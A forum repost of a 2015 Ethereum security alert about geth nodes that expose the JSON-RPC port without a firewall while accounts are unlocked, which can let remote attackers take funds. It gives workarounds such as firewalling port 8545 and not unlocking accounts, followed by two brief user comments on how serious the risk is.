**Security Alert: Insecurely configured geth with no firewall and unlocked accounts can lead to fund

GeorgeHallamGeorgeHallam Member, Administrator, Moderator Posts: 229 admin
Security Alert – Insecurely configured geth can make funds remotely accessible

Posted by Jutta Steiner on August 29th, 2015.
Insecurely configured geth with no firewall and unlocked accounts can lead to funds being accessed remotely by attackers

Affected implementation: Issue reported for geth, though all implementations incl. C++ and python can in principle display this behavior if used insecurely; only for nodes which leave the JSONRPC port open to an attacker (this precludes most nodes on internal networks behind NAT).

Likelihood: Medium

Severity:High

Impact: Loss of funds related to wallets imported or generated in clients

Details: The RPC allows you to send transactions from any account which has been unlocked prior to sending a transaction and will stay unlocked for the entirety of the the session. By default, RPC is accessible only from the same host on which geth is running. By opening the RPC to be accessed by anyone on the internet and not including a firewall rules, you open up your wallet to theft by anybody who knows your address in combination with your IP

Effects on expected chain reorganisation depth: none

Remedial action taken by Ethereum: eth RC1 will be fully secure by requiring explicit user-authorisation for any potentially remote transaction. Later versions of geth may support this functionality.

Proposed temporary workaround: Ensure you have a firewall in place on the JSONRPC port (default 8545) to prevent attackers from using the RPC.

Alternative, secondary workaround: Never unlock any accounts.

Alternative workaround (geth only): Do not use the --rpccorsdomain option

Fix: TBD

For updates, please refer to this blog post: https://blog.ethereum.org/2015/08/29/security-alert-insecurely-configured-geth-can-make-funds-remotely-accessible/

Comments

  • StephanTualStephanTual London, EnglandMember, Moderator Posts: 1,282 mod
    edited August 2015
    This only affect you if you have RPC on (ie, run geth with --rpc) AND unlock the account AND have no firewall at all (ie, you have configured your router to map the port) AND have --rpcaddr set to "0.0.0.0"

    You'd have to get out of your way for this to happen, it's a bit like saying "If you open up port 80 on your firewall and your mac, and have installed apache and have started the service, then people can browse webpages on your computer".
    Post edited by StephanTual on
  • dny1234dny1234 Member Posts: 1
    The impact is a little more serious than people browsing webpages. More like accessing your online banking if you've logged in. Multiple people have lost their money this way.
Sign In or Register to comment.